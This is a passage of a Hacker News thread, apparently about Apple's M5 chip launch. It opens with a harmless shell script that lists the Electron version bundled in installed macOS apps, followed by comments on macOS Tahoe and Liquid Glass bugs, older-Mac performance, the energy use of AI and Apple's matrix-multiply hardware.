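    # List apps that bundle Electron and print the bundled framework version.
    for fw in /Applications/*.app/Contents/Frameworks/Electron\ Framework.framework; do
      [ -d "$fw" ] || continue
      app=${fw%%/Contents/*}
      ver=$(/usr/libexec/PlistBuddy -c 'Print :CFBundleShortVersionString' \
            "$fw/Resources/Info.plist" 2>/dev/null)
      echo "${app##*/}: Electron ${ver:-unknown}"
    done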

xrisk•1h ago
Hmm, there are apps flagged by your script that claim to be fixed according to https://avarayr.github.io/shamelectron/ (Signal, Discord, Notion, etc.). And I checked that those apps are updated. Which one's correct?
runjake•1h ago
HN broke the script. Here's a link: https://gist.github.com/tkafka/e3eb63a5ec448e9be6701bfd1f1b1...
Eric_WVGG•1h ago
unpatched include Asana, Bitwarden, Dropbox… some pretty high-profile apps
fjarlq•1h ago
Helpful script, except it prints the same line regardless of the version found.
geoffpado•1h ago
If I’m remembering correctly, the original script he found had different emoji in the two lines (red X vs. green checkmark), but since HN comments strip emoji, pasting it here made them equivalent.
runjake•1h ago
HN nerfed the script. Here you go: https://gist.github.com/tkafka/e3eb63a5ec448e9be6701bfd1f1b1...
Angostura•1h ago
I don't get this - I have an M1 iMac - haven't noticed much difference.
lelandfe•5h ago
As a UI/UX nerd, it’s a coin flip on intentionality. I’ve been noticing so many rough edges to Apple’s software when it used to astound. iOS Settings search will flash “No Results” as you begin to type, which is comically amateurish. The macOS menu bar control panels can’t be keyboard-navigated... It’s just silly.

I’ve been debating making a Tumblr-style blog, something like “dumbapple.com,” to catalogue all the dumb crap I notice.

butlike•5h ago
iirc, there's a setting to make the menu bar navigable. You just need to "alt+tab" to it with some weird button combo, like Ctrl + Cmd + 1 or something.
lelandfe•4h ago
You can turn on "Full Keyboard Access," which paints a hideous rectangle around anything you focus but does allow keyboard access to everything.

But, like, man - why can't I just use the arrow keys to select my WiFi network anymore? I was able to for a decade.

And the answer, of course, is the same for so much of macOS' present rough edges. Apple took some iPadOS interface elements, rammed them into the macOS UI, and still have yet to sand the welds. For how much we complain on HN about Electron, we really need to be pissed about Catalyst/Marzipan.

Why does the iCloud sign in field have me type on the right side of an input? Why does that field have an iPadOS cursor? Why can't I use Esc to close its help sheet? Why aren't that sheet's buttons focusable?

Why does the Stocks app have a Done button appear when I focus its search field? Why does its focus ring lag behind the search field's animated size?

Where in the HIG does it sign off on unfocusable text-only bolded buttons, like Maps uses? https://imgur.com/a/e7PB5jm

...Anyway.

netcoyote•1h ago
There's also an app, MenuWhere, that enables you to configure different keys to walk the menu bar. It's free (but nagware). https://manytricks.com/menuwhere/
vessenes•4h ago
Liquid Glass feels rushed to me. Tons of UI annoyances especially on iPhone - it's suddenly many clicks to get to prior calls for instance, a core way I call people. I'm imagining it will get ironed out over the next two years.
bombcar•54m ago
It really does. It’s a two-year update and they should have had two teams - one for Liquid Glass working for the next release, and one doing a Snow Leopard-type cleanup for this year. Let the Mac and iPhone be a bit out of sync if needed.
jtbayly•4h ago
Please do this. Here are some examples to add to your list, leaving out the 26.0 bugs that I've come to expect running a .0 release.

1. I won't focus on a bunch of Siri items, but one example that always bugs me: I cannot ask Siri to give me directions to my next meeting. The latest OS introduces an answer for the first time, though. It tells me to open the calendar app on my Apple watch, and tap on the meeting, and tap the address. (I don't have an Apple watch.)

2. Mail.app on iOS does not have a "share sheet." This makes it impossible to "do" anything with an email message, like send it to a todo app. (The same problem exists with messages in Messages.app)

3. It is impossible to share a contact card from Messages.app (both iOS and macOS). You have to leave Messages, go to Contacts, and select the contact to share. Contacts should be one of the apps that shows up in the "+" list like Photos, Camera, Cash, and plenty of third-party apps.

4. You still have to set the default system mail app in macOS as a setting in Mail.app, instead of in System Settings. Last I checked, I'm pretty sure you couldn't do this without first setting up an account in Mail.app. Infuriating.

grincho•2h ago
I had that complaint about Mail too. Then I realized you can begin dragging an email (from the list view), switch apps with your other hand, and drop it into, say, a todo. Of course, this is less discoverable, so I agree a Share button would not go amiss.
askonomm•4h ago
There already is something like it (though not Apple-exclusive): https://grumpy.website/
jerf•3h ago
"iOS Settings search will flash “No Results” as you begin to type which is comically amateurish."

I'd love to agree that it's comically amateurish, but apparently there's something about settings dialogs that makes them incredibly difficult to search. It takes Android several seconds to search its settings, and the Microsoft Start menu is also comically slow if you try to access control panels through it, although it's just comically slow at search in general. Even Brave here visibly chokes for like 200ms if I search in its preferences dialog... which compared to Android or Windows is instant but still strikes me as a bit on the slow side considering the small space of things being searched. Although it looks like it may be more related to layout than actual searching.

Still. I dunno why but a lot of settings searches are mind-bogglingly slow.

(The only thing I can guess at is that the search is done by essentially fully instantiating the widgets for all screens and doing a full layout pass and extracting the text from them and frankly that's still not really accounting for enough time for these things. Maybe the Android search is blocked until the Storage tab is done crawling over the storage to generate the graphs that are not even going to be rendered? That's about what it would take to match the slowdown I see... but then the Storage tab happily renders almost instantly before that crawl is done and updates later... I dunno.)

robenkleene•2h ago
The parent isn't commenting about the speed of search, just that saying "No Results", when they really mean "we're still checking for results" is bad UI (which I agree with).
fodkodrasz•1h ago
It is possibly the null-value pattern in action, which is a good thing in my opinion (as in robust), though displaying it this way is a bit suboptimal.

Funny that I'm defending them, but this is not even a papercut in my opinion, while they have far bigger issues.

fragmede•6m ago
I'm sure this is me seeing the past through rose-colored glasses, but the reason bits of visual pollution like that are particularly annoying is that Apple shit used to be so exceptionally polished. Not sure what emotion I want to project onto them as to why they're like that now (or if it's even actually true), but the perception is: if they're no longer getting the little stuff like that polished anymore, what else just isn't being done to the same high standard?
SoKamil•2h ago
The old System Preferences search was lightning fast compared to current SwiftUI System Settings on macOS.
vizzier•2h ago
Might have to be more specific than Android and Windows. Tried them on my devices (S24, windows 11) and they're practically instantaneous.
Insanity•5h ago
Yeah, I love my M1 iPad Pro. But the "liquid glass" update made it feel slower. Really only the 'unlock' feels slower; once I'm using it, it's fine. But it's slightly annoying and does make me want to update this year to the M5.

But it's a glorified Kindle and YouTube box, so I'm hesitating a little bit.

asimovDev•5h ago
my dad's got a pre-AS iPad Pro and it's so bad after updating to 26. My 6th gen iPad on iOS 17 felt faster than this
knowitnone3•3h ago
"make me want to update this year to the m5." Then Apple software devs did what they were told
butlike•5h ago
I think it's probably a play to get you to upgrade for the new GPU computational power. I _do_ think that what we're seeing (and marketed as AI) will be the future, but I don't think it will look like what we're seeing now. Whatever that future holds will require the upgraded capabilities of these new GPU architectures, and this being a reason for the subtle nudge to upgrade from Apple makes sense to me.

It feels very much like how I imagine someone living in the late 1800's might have felt. The advent of electricity, the advent of cars, but can't predict airplanes, even though they're right around the corner and they'll have likely seen them in their lifetime.

WhitneyLand•5h ago
“nobody really needs to upgrade that for most things”

Maybe, but for lots of scenarios even M5 could still benefit from being an order of magnitude faster.

AI, dev, some content scenarios, etc…

dawnerd•4h ago
I’m still daily-driving my M1 Max and have no reason to upgrade for a long time. There’s really nothing in my workflow that could be markedly improved performance-wise. The only thing is maybe more RAM, as the need for that keeps growing - I’m just under 30GB when running a bunch of containers.
SkyPuncher•4h ago
There are so many software related things that drive me absolutely loony with Apple right now.

* My iPhone as a remote for my Apple TV randomly decides it can't control the volume - despite the "Now Playing" UI offering an audio control that works.

Their auth screens drive me crazy:

* Why can I not punch in a password while Face ID is working? If I'm skiing, I know Face ID isn't going to work, stop making me wait.

* Likewise, on Apple TV the parental control input requires me to explicitly choose to enter a PIN code. Why? Just show me the PIN code screen. If I can approve from my device, I will.

  * Similarly, if I use my phone as a remote, why do I need to manually click out of the remote to get to the parental control approval screen. I'm literally using my phone. Just auto-approve.
strbean•2h ago
> * Why can I not punch in a password while Face ID is working? If I'm skiing, I know Face ID isn't going to work, stop making me wait.

Funny, a similar thing has been driving me crazy on my Ubuntu 20.04 laptop with fingerprint login. When unlocking, I can either enter a password or use fingerprint. On boot, I am not allowed to enter a password until I fail with fingerprint. If I use fingerprint to log in on boot, I have to enter my password anyways once logged in to unlock my keychain.

I should probably just figure out a way to disable fingerprint on boot and only use it for the lock screen.

prettymuchnoone•1h ago
I think this is a GNOME thing...the keychain by default has the same password as the login password, so logging in with the password unlocks it too. fingerprint login doesn't unlock it: https://news.ycombinator.com/item?id=38527876, https://wiki.archlinux.org/title/GNOME/Keyring
sotix•2h ago
Why can I not use my password manager for my Apple ID but can use it for any other password field? Instead I have to switch to my password manager, copy the password, reopen the App Store, select get app, and paste the password in the Apple ID login pop up in the 10 seconds before my password clears from my clipboard.
mschuster91•1h ago
Been ages but I think you can mitigate that annoyance by approving fingerprint purchases.
sgt•2h ago
I highly recommend the Apple remote... then you also don't need to take your phone with you when you are watching TV, which is an added benefit for some.

Of course, the thin Apple remote has a way of getting lost, but it has a find-my-remote feature which locates it pretty well.

SkyPuncher•2h ago
Remote is fine, but it's always stuck in a couch cushion.
sgt•1h ago
Same here... so we use that Find Remote functionality about once a month! Without it we'd be lost. Business idea: make a cover for the Apple remote that makes it bigger and harder to lose.
K7PJP•29m ago
There was a company or two that made cases for the older Apple remotes with the express purpose of making them larger, which I always thought was kind of funny. I would buy one for the current remote if one existed.
gxs•2h ago
As someone who jumped on the Apple bandwagon at peak Apple and hasn’t been through all their ups and downs the way some die-hards have been, it’s been super aggravating dealing with Apple’s shit lately - not what I signed up for all those years ago

It seems to have been degrading for a long time, but for me it’s this past year where it’s crossed into that threshold Android used to live in, where using the phone causes a physiological response from how aggravating it can be sometimes

I let my guard down and got too deep into the Apple ecosystem - I know better and always avoided getting myself into these situations in the past, but here I am

The phone sucks right now - super buggy, and they continue to remove/impose features that should be left as an option to the user. Yes, this has always been the knock on Apple, but I typically haven’t had an issue with their decisions - it’s just so bad now

Lesson (re)learned and I will stay away from ecosystems - luckily the damage here is only for media

The minute I can get blue bubbles reliably on an Android, I’ll give the Pixel a shot again - if that sucks too then maybe I’ll go back to my teenage years and start rooting devices again

skinnymuch•2h ago
How would you ever get blue bubbles reliably on Android? Are you talking about iMessage or something else?

I am fully bought into the Apple ecosystem. Not sure yet if I regret it. It is annoying to be so tied down to one company that isn’t going the way I want it to.

gxs•9m ago
Yeah iMessage - over the years there have been “breakthroughs” - people find nifty workarounds or have even reverse engineered the iMessage protocol, but for whatever reason nothing ever sticks

There are current workarounds, like using your home Mac as a relay, but nothing super elegant that I know of

SkyPuncher•1h ago
So, I still think the experience is generally better and more integrated than when I was on an Android device. I just find they're generally not really paying attention to user details the way they have in the past.
sample2•1h ago
I see the same bug with the remote on my phone, how did they manage to break volume control in the app while keeping it working from the lock screen “now playing”?

I’ve also been unable to get the remote app on my watch to work at all. It’s hard to imagine people working at Apple don’t also run into these issues all the time.

thenaturalist•3h ago
Don't kid yourself: planned obsolescence is real.

Apple has a higher duty to their shareholders than to their customers.

Not hating on Apple, just stating the hard economic truth.

random3•2h ago
This needs benchmarks.

Sad if true. My M1 Max has felt sluggish lately too, after bragging that this was the longest-lived work machine I've had and thinking I'm good to wait for the M6. This is not good for business, but IMO you need more than raw power to justify upgrades even for professional use - form factor, screen quality, battery, etc.

I think they bet a lot of hardware money on AI capabilities, but failed to deliver the software, so there was no real reason to upgrade because of AI features in the chip (which is literally what they boast on the first line of the announcement - yet nobody cares about making more cute faces)

It's not 100% their fault. Everyone got onto the LLM bandwagon like it's "the thing" so even if they didn't believe it they still needed something. Except an OS is not a chat interface, and LLMs do suck at stricter things.

lawlessone•2h ago
>The M1 itself is so powerful that nobody really needs to upgrade that for most things most people do on their computers

A rant on my part, but a computer from 10 years ago would be fine for what most people do on their computers, if not for software bloat...

JumpCrisscross•2h ago
> Tahoe however makes my M1 Air feel sluggish

Counterpoint: my M1 Pro was a turtle for a few weeks and then stopped doing nonsense in the background and is back to its zippy self. (Still buggy. But that would be true on new hardware, too.)

quadyeast•1h ago
mediaanalysisd has been consuming ~140% CPU since upgrading a few weeks ago. I just turned off Apple Intelligence and it dropped to 0%.
seunosewa•2h ago
My M1 Air got very sluggish after upgrading to Tahoe but then it started behaving normally after a couple of days. Hopefully, you'll experience the same soon.
comboy•17m ago
It's definitely happening with watches and maybe phones after system upgrade, mostly perceivable through the battery drain - does anybody know what is happening under the hood? I understand if they changed some way of indexing data or something but it's after every major OS upgrade.
antipaul•2h ago
Which is harder these days, software or hardware?
DSingularity•1h ago
Each is challenging in its own way. The real challenge is that we need hardware-software co-design, and that's the tricky part.
kwanbix•2h ago
I really wish apple sold the Mx to others like Lenovo.

I would love to see a ThinkPad with an M5 running Linux.

fph•1h ago
What is the Linux experience on new Mac hardware? I'd be interested also in running a Macbuntu.
bmdhacks•1h ago
Asahi Linux is essentially in a holding pattern, with support only up to the M2. Likely Linux will never be supported above the M2, and even the M2 has a lot of rough edges. When my monitor sleeps on M2 Linux, it can never reawaken without a reboot.
greg5green•2h ago
>The M5 MacBook Pro still gets the Broadcom WiFi chip but the M5 iPad Pros get the N1 and C1X (Sweet).

Is that good? Their cellular modems have been terrible. I'll reserve judgement until trying one out.

>The M1 itself is so powerful

I think this is a bit of a fallacy. Apple Silicon is great for the performance-per-watt ratio, but something like a Ryzen 9 7945HX can do 3x more work than an M1 Max. And a non-laptop chip, like an Intel Core Ultra 7 265K, can do 3.5x.

wizee•1h ago
Those ratios seem way off if you're referring to the M1 Max and not the base M1. If we use Geekbench CPU performance, the Ryzen 9 7945HX (which is from 2023) is around 12% faster single core and 32% faster multicore than the M1 Max (which is from 2021). If you look at the 2024 M4 Max, it's substantially faster than the Ryzen and Intel you mentioned.

https://browser.geekbench.com/processors/amd-ryzen-9-7945hx

https://browser.geekbench.com/processors/intel-core-ultra-7-...

https://browser.geekbench.com/macs/macbook-pro-16-inch-2021-...

https://browser.geekbench.com/macs/macbook-pro-16-inch-2024-...

Avamander•45m ago
Having a cellular modem on a MacBook would be really handy even if it's not perfect.
n8cpdx•42m ago
Source re:modem claims? Performance seems fine in general, modestly slower on very high end networks but using 25% less power.

Performance claims:

https://www.ookla.com/articles/iphone-c1-modem-performance-q...

Energy claims:

https://appleinsider.com/articles/25/02/27/apples-c1-modem-b...

phamduongtria•1h ago
Even the M4 Max MacBooks I tried in the stores were running like shit on Tahoe
port11•1h ago
It's incredible what the hardware teams at Apple have been doing. I imagine they also feel let down by the software that's driving these beasts. It's as if they're 2 completely different companies.
kenjackson•35m ago
The latest iPhone OS (iOS 26) is embarrassing. The number of glitches and amount of UI sloppiness is crazy for a company that historically prided itself on the details. It's the first major iOS update I've taken that just seems almost strictly worse than its predecessor.
wartywhoa23•1h ago
> ...The <thing I own right now> is so powerful that nobody really needs to upgrade...

I've been hearing this since the Intel 486DX times, and

> Nobody will ever need more than 640K of RAM!

bombcar•58m ago
This is the first time I’ve gone four+ years without even a real desire to upgrade. I have a hard time figuring out what would even be faster.

Amusingly enough, adding more ports could do it.

dimal•11m ago
Seems like the software teams are there to simply squander the extra processing power that the hardware teams provide, thus ensuring recurring revenue. I see no good reason to upgrade to Tahoe. I’d have to buy a new computer just so I could power transparencies that I don’t want.
jadbox•6h ago
... no benchmarks?
nake13•6h ago
It seems this generation focuses more on GPU and AI acceleration rather than CPU. The M5 chip allows Apple Vision Pro to render 10% more pixels and operate at up to 120 Hz. It delivers up to four times the peak GPU compute performance compared with M4, provides 30% higher graphics performance, and offers 15% faster multithreaded CPU performance.
Noaidi•6h ago
I am wondering if Apple's focus is off lately with this drive for AI. So far all they are showing in that presentation is that I can have

"the ability to transform 2D photos into spatial scenes in the Photos app, or generating a Persona — operate with greater speed and efficiency."

And by making Apple AI (which is something I do not use for many reasons, but mainly because of climate change) their focus, I am afraid they are losing their way and making their operating systems worse.

For instance, Liquid Glass, the mess I was lucky enough to uninstall before they put in the embargo against doing so, is, well, a mess. An alpha release in my opinion, which I feel was a distraction from their lack of a robust AI release.

So by blowing money on the AI gold rush that they were too late for, will they ultimately ruin their products across the board?

I am currently attempting to sell my iPhone 16E and my M1 Macbook Air to move back to Linux because of all of this.

steinvakt2•5h ago
If you don’t use AI for climate reasons then you should read the recent reports about how little electricity and water is actually used. It’s basically zero (image and video models excluded). Your information about this is probably related to GPT3.5 or something. Which is now 3 years old - a lifetime in AI world.
greekrich92•5h ago
Big data centers running tons of GPUs and the construction of even bigger ones is not carbon neutral come on
wat10000•5h ago
Don't newer models use more energy? I thought they were getting bigger and more computationally intensive.
trenchpilgrim•5h ago
They use a massive amount of energy during training. During inference they use a tiny amount of energy, less than a web search (turns out you can be really efficient if you don't mind giving wrong answers at random, and can therefore skip expensive database queries!)
wat10000•4h ago
Right, but the comment I was responding to suggested that ChatGPT3.5 used lots of energy and newer models use less.
trenchpilgrim•1h ago
Indeed, this is correct. See today's Claude Haiku 4.5 announcement for an example.
imcritic•5h ago
I think they will continue ruining their products via software updates. That's implied by the walled-garden approach they chose for their business: it forces users to consoom more and thus generates profits. Apple isn't a "lean" company; it needs outrageous profits to stay afloat.
StopDisinfo910•5h ago
> making Apple AI [...] their focus

Are they really doing that? Because if it's the case they have shockingly little to show for it.

Their last few attempts at actual innovation seem to have been less than successful. The Vision Pro failed to find an audience. Liquid Glass is, to put it politely, divisive.

At this point, it seems to me that good SoCs and a captive audience in the US are pretty much all they have remaining, and competition on the SoC front is becoming fierce.

Noaidi•4h ago
Yeah, I agree, they have a captive audience for sure. But they still need to satisfy shareholders. If people are failing to upgrade, that is a problem. And the battery drain on my iPhone 16e on Glass was horrific. I know casual users who did not notice until I pointed it out, and then they tracked it better. This, unfortunately, makes me think conspiratorially. Even a modest amount of extra battery use and degradation will mean more upgrades in the future.

But I think $500 billion is a lot of money for AI:

Apple accelerates AI investment with $500B for skills, infrastructure

https://www.ciodive.com/news/Apple-AI-infrastructure-investm...

Imagine using that $500 billion on the operating system, squashing bugs, or making the system even more energy efficient? Or maybe figuring out how to connect to an Android tablet's file system natively?

knotimpressed•5h ago
Assuming you've read https://andymasley.substack.com/p/a-cheat-sheet-for-conversa... or the longer full essay/related works, could you elaborate on why you don't use Apple Intelligence?

I totally understand why someone would refuse to use it due to environmental reasons (amongst others) but I'm curious to hear your opinions on it.

pcdoodle•5h ago
For me: unproven trust and no killer feature.

If I can't search my Apple Mail without AI, why would I trust AI?

sylens•5h ago
> could you elaborate on why you don't use Apple Intelligence?

Why would I trust this when they can't deliver a voice assistant that can parse my sentences beyond "Set a reminder" or "Set a timer"? They have neglected this area of their products for over a decade, they are not owed the benefit of the doubt

Noaidi•4h ago
Some commenters already answered for me. To me there is no real use benefit. I am rather a simple user and it seems to take up space on the phone as well. I refuse to use iCloud so space is important to me since photography is what I do the most.

Also, I like researching things old school how I learned in college because I think it leads to unintended discoveries.

I do not trust the source you linked to. It is an organization buried under organizations for which I cannot seem to find their funding source after looking for a good 15 minutes this morning. It led me back to https://ev.org/ where I found out one guy used to work for "Bain and Company", a consulting firm, and was associated with FTX funding:

https://oxfordclarion.uk/wytham-abbey-and-the-end-of-the-eff...

Besides "Effective Altruism" makes no sense to me. Altruism is Altruism IMO.

Altruism: unselfish regard for or devotion to the welfare of others

There is no way to be ineffective at altruism. The more you have to think about altruism the further you get from it.

But the organization stinks as some kind of tech propaganda arm to me.

timeon•4h ago
Not sure why one would think that article is anything other than a distraction attempt. Because emissions are adding up.

I'm from a country (in Europe) where CO2 emissions per capita [0] are 5.57 while the number for the USA is 14.3, so reading this sentence in that article - "The average American uses ~50,000 times as much water every day..." - surely does not imply that one should use ChatGPT because it is nothing. If the "average American" wants to decrease emissions, then not using LLMs is just a start.

[0]: https://ourworldindata.org/grapher/co-emissions-per-capita

adastra22•57m ago
> I totally understand why someone would refuse to use it due to environmental reasons

Huh. This one baffles me.

jeffbee•4h ago
I'm interested in reading about your low-carbon lifestyle that is so efficient you got to the point of giving up machine inference.
timeon•4h ago
Depends where you are. People in some countries have a lot of catching up to do: https://ourworldindata.org/grapher/co-emissions-per-capita

Maybe they are in the USA - every little thing counts there.

Noaidi•3h ago
I am in the US, and thanks for that link. I am of the opinion that the Climate Crisis should be the number one focus for everyone right now.

So, to keep this on point, Apple making a faster chip is not on my climate change agenda, and is nothing but a negative.

jeffbee•3h ago
No, in the USA it is the opposite. The little things do not and cannot add up to anything. The only things that make a difference are motor fuels and hamburgers.
Noaidi•3h ago
I live in a van full time. I have a 200w solar panel and a 1500w output solar battery that powers everything I use, mostly for cooking, sometimes heat. I also poop in the woods a lot. :) I do not use the internet much really. Driving is my biggest carbon footprint but I really do not put much more mileage than the average suburban person. Anyway, I try my best. I am permanently disabled so that makes a lot of it easier. Being poor dramatically lowers one's carbon footprint.
jeffbee•3h ago
If you drive a van as much as the average suburbanite drives their vehicle, emitting ~10 metric tons of CO2 annually, posting about how you gave up local machine inference for the climate is performative and asinine. Burning 1000 gallons of motor fuel has the same GHG impact as 300 million uses of Google Gemini, and the CO2 impact of local inference on a Mac is even less.
leakycap•1h ago
What a nice way to talk to another person who... didn't attack you?

A typical passenger car driving 12,000 miles puts out about 5 metric tons of CO2

The person driving that passenger car likely has a 1,000 sq ft or larger home or apartment, which can vary widely but could be reasonably estimated at another 5 metric tons of CO2 (Miami vs. Minnesota makes a huge difference)

So we're at 10 metric tons for someone who doesn't live in a van but still drives like a suburbanite

Care to be a little kinder next time you feel whatever compelled you to write your response to the other user? Jeesh.

Noaidi•10m ago
First, I need my van. My van is my house.

> Burning 1000 gallons of motor fuel has the same GHG impact as 300 million uses of Google Gemini, and the CO2 impact of local inference on a Mac is even less

Still, even if, let's say, your numbers are correct (and I feel they are not), does that mean I should just add to the problem and use something I do not need?

Driving my van for my yearly average creates about 4.4 metric tons of CO2.

"A more recent study reported that training GPT-3 with 175 billion parameters consumed 1287 MWh of electricity, and resulted in carbon emissions of 502 metric tons of carbon, equivalent to driving 112 gasoline powered cars for a year."

https://news.climate.columbia.edu/2023/06/09/ais-growing-car...

Just to get an idea of how I conserve, another example is that I only watch videos in 480p because it uses less power. This has a double benefit for me since it saves my solar battery as well.

I am not bragging, just showing what is possible. Right now, still being in the desert this week, my carbon footprint is extremely low.

Second, I cannot really trust most numbers that are coming out regarding AI. Sorry, just too much confusion and green-washing. For example, Meta is building an AI site that is about the size of Manhattan. Is all the carbon used to build that counted in the equations?

But this paper from 5/25:

https://www.technologyreview.com/2025/05/20/1116327/ai-energ...

says "by 2028 more than half of the electricity going to data centers will be used for AI. At that point, AI alone could consume as much electricity annually as 22% of all US households."

And

"Tallies of AI’s energy use often short-circuit the conversation—either by scolding individual behavior, or by triggering comparisons to bigger climate offenders. Both reactions dodge the point: AI is unavoidable, and even if a single query is low-impact, governments and companies are now shaping a much larger energy future around AI’s needs."

And

"The Lawrence Berkeley researchers offered a blunt critique of where things stand, saying that the information disclosed by tech companies, data center operators, utility companies, and hardware manufacturers is simply not enough to make reasonable projections about the unprecedented energy demands of this future or estimate the emissions it will create. "

So the confusion and obfuscation are enough for me to avoid it. I think AI should be restricted to research, not used for most of the silliness and AI slop that is being produced. Because, you know, we are not even counting the AI slop views that also take up data space and energy from people looking at it all.

But part of why I do not use it is my little boycott. I do not like AI, at least how it is being misused to create porn and AI slop instead of doing the great things it might do. They are misusing AI to make a profit. And that is also what I protest.

Tagbert•2h ago
Most of the AI and machine learning Apple has done so far is done on device, so you can judge for yourself whether there is any climate change concern or not.
GaggiX•6h ago
>The 10-core GPU features a dedicated Neural Accelerator in each core

"The neural engine features a graphic accelerator" probably M6

h1fra•5h ago
I keep seeing all those crazy screenshots from games on Mac, and yet there are barely any big releases for this platform. I guess it benefits a whole range of software, not just games, but still that's a pity.
tantalor•5h ago
Because gaming on Mac actually looks bad in practice.

https://news.ycombinator.com/item?id=44906305

qnpnp•3h ago
This is easy to fix, not an explanation.

Gaming on mac is indeed lacking, but that's really not the reason.

tantalor•1h ago
It's a symptom of the deeper problem: Apple does not value game developers or the experience of users.
SXX•5h ago
32GB RAM limit on current M5 models. Now wait for M5 Max.
bombcar•5h ago
M5 Max Macs

If they're studios, you can have stacks of M5 Max Macs.

gmm1990•5h ago
Interesting that there's only the M5 on the MacBook Pro. I thought the M4 and M4 Pro/Max launched at the same time on the MacBook Pro
jbjbjbjb•5h ago
I’m glad I opted to get the base model M4 Mac Mini rather than upgrade the memory for longevity.
mohsen1•5h ago
First time seeing Apple using "AI" in their marketing material. It was "Machine Learning" and "Apple Intelligence" before...
mentalgear•5h ago
Unfortunately, they have also succumbed to the AI hype machine. Apple calling it by its actual name, "machine learning", was about the only thing I still liked about Apple.
rpdillon•5h ago
Wait, didn't they try to backronym their way into "Apple Intelligence" last cycle?

https://www.apple.com/apple-intelligence/

kryllic•5h ago
Probably don't want to draw more attention to their ongoing lawsuits [1]. Apple, for all its faults, does enjoy consistency, and the unruly nature of LLMs is something I'm shocked they thought they could tame in a short amount of time. The fallout of the hilariously bad news/message "summaries" was more than enough to spook Apple from allowing that to go much further.

>Built into your iPhone, iPad, Mac, and Apple Vision Pro* to help you write, express yourself, and get things done effortlessly.** Designed with groundbreaking privacy at every step.

The asterisks are really icing on the cake here.

---

[1] https://news.bloomberglaw.com/ip-law/apple-accused-of-ai-cop...

kgwgk•5h ago
> actual name "machine learning"

Yesterday’s hype is today’s humility.

adastra22•1h ago
Machine learning is a bit more specific than what we now call AI, no?
low_tech_punk•5h ago
Not all is lost: AI can still be an acronym for Apple Intelligence.
vessenes•4h ago
I like sniping - but I could make a product call here to support the messaging - when it's running outside diffusion models and LLMs (as per the press release) we could call that AI. Agreed that they should at least have mentioned Apple Intelligence in their PR though
vayup•3h ago
I am sure by AI they mean Apple Intelligence:-)
lenerdenator•5h ago
Now if some game companies would just port their wares to Apple Silicon and the macOS libraries already...
zoobab•5h ago
Does it run Linux?
sameermanek•5h ago
Did anyone else notice that the base storage has been upgraded to 512GB? I knew this was coming after the iPhone 17's storage upgrade!
xd1936•5h ago
512GB was the base storage of the M4 also.

https://web.archive.org/web/20251010205008/https://www.apple...

criddell•4h ago
Looks like the base storage on the iPad Pro is still 256 GB.
Tepix•4h ago
This is the Macbook Pro, not the Macbook Air.
gzer0•5h ago
The M5 chip is currently only available with up to 32 GB of RAM on the 14-inch MacBook Pro variant, just FYI.

[1] https://www.apple.com/us-edu/shop/buy-mac/macbook-pro/14-inc...

pixelpoet•5h ago
That's laughable in 2025, and together with the wimpy 153 GB/s memory bandwidth (come on, Strix Halo is 256GB/s at a fraction of the price!) they really don't have a leg to stand on calling this AI-anything!
hannesfur•4h ago
As pointed out in other places as well, a better comparison will be the upcoming Pro & Max variants. Also, as far as I know, Strix Halo mainly uses the GPU for inference, not the little AI accelerator AMD has put on there. That one is just too limited.
Tepix•4h ago
So you're saying these won't sell at all?
pixelpoet•4h ago
I'm saying this is pretty weaksauce for AI-anything in 2025, especially considering the price tag. Sure, there will be later models with more memory and bandwidth (no doubt at eye-watering prices), but with 32 GB this model isn't it.

I'm sure it's a perfectly fine daily driver, but you have to appreciate the irony of a massive chip loaded to the gills with matrix multiplication units, marketed as an amazing AI machine, and yet so hobbled by mem capacity and bandwidth.

jon-wood•5h ago
> Apple 2030 is the company’s ambitious plan to be carbon neutral across its entire footprint by the end of this decade by reducing product emissions from their three biggest sources: materials, electricity, and transportation.

But never, ever, through not shipping incremental hardware bumps every year regardless of whether there's anything really worth shipping.

Cthulhu_•5h ago
I'm always skeptical about these carbon neutral pledges because in practice it's a lot of administrative magic, like paying a company that says they will plant trees or whatever which will sign some official looking paper saying 'ye apple totaly compensated three morbillion tonnes of carbon emissions'.

And it's things like not including a charger, cable, headphones anymore to reduce package size, which sure, will save a little on emissions but it's moot because people will still need those things.

asdhtjkujh•4h ago
Very few people are buying a new machine every year, even when the updates (like this year) are arguably more than incremental — selling outdated hardware that will become obsolete sooner is not more environmentally-friendly.

Hardware longevity and quality are probably the least valid criticisms of the current Macbook lineup. Most of the industry produces future landfill at an alarming rate.

SG-•4h ago
The second-hand Apple market is very big, especially since M-series MacBooks leapfrogged performance.
sebastianconcpt•5h ago
Wonder how it compares with the M4 Max that I've just bought haha
dmix•5h ago
Same I just bought an M4 Max 2 weeks ago and had a bit of anxiety for a moment. I'm going to justify it because they haven't released M5 Max yet
sebastianconcpt•5h ago
It's going to be fine, what's important is what we do with the thingy :)

Logos is King

whitepoplar•5h ago
Any word on whether this chip has "Memory Integrity Enforcement" capability, as included in Apple's A19/A19 Pro chips?

https://security.apple.com/blog/memory-integrity-enforcement...

SG-•4h ago
it's the same core, so more than likely yes.
gcr•5h ago
So how many hardware systems does Apple silicon have for doing matrix multiplies now?

1. CPU, via SIMD/NEON instructions (just dot products)

2. CPU, via AMX coprocessor (entire matrix multiplies, M1-M3)

3. CPU, via SME (M4)

4. GPU, via Metal (compute shaders + simdgroup-matrix + mps matrix kernels)

5. Neural Engine via CoreML (advisory)

Apple also appears to be adding a “Neural Accelerator” to each core on the M5?

hannesfur•5h ago
I inferred that by "neural accelerators" they meant the neural engine cores, or it could be a bigger/different AMX (which really should become a standard, btw)
oskarkk•3h ago
Would it be possible to use all of them at the same time? Not necessarily in a practical way, but just for fun? Could the different ways of doing this on the CPU be used to some extent by one core at the same time, given it's superscalar?
staticfloat•2h ago
This is a very old answer about the M1, but yes what you’re saying is possible: https://stackoverflow.com/a/67590869/230778
nullbyte•2h ago
Thankfully I think libraries like PyTorch abstract this stuff away. But it seems very convoluted if you're building something from the ground up.
gardnr•50m ago
Does PyTorch support other acceleration? I thought they just support Metal.
twoodfin•1h ago
Is this really strange? Matmul is just a specialized kind of primitive compute, one that is seeing an explosion in practical uses.

A Mac Quadra in 1994 probably had floating point compute all over the place, despite the 1984 Mac having none.

jmrm•1h ago
I wonder if some Apple-made software, like Final Cut, makes use of all of those "duplicated" instructions at the same time to get better performance...

I know the multitasking nature of the OS probably makes this happen across different programs anyway, but it would nonetheless be pretty cool!

HeckFeck•53m ago
Adding CPUs and GPUs on top of your CPUs and GPUs... Sounds like we've the spiritual successor of the Sega Saturn.
throwaway31131•29m ago
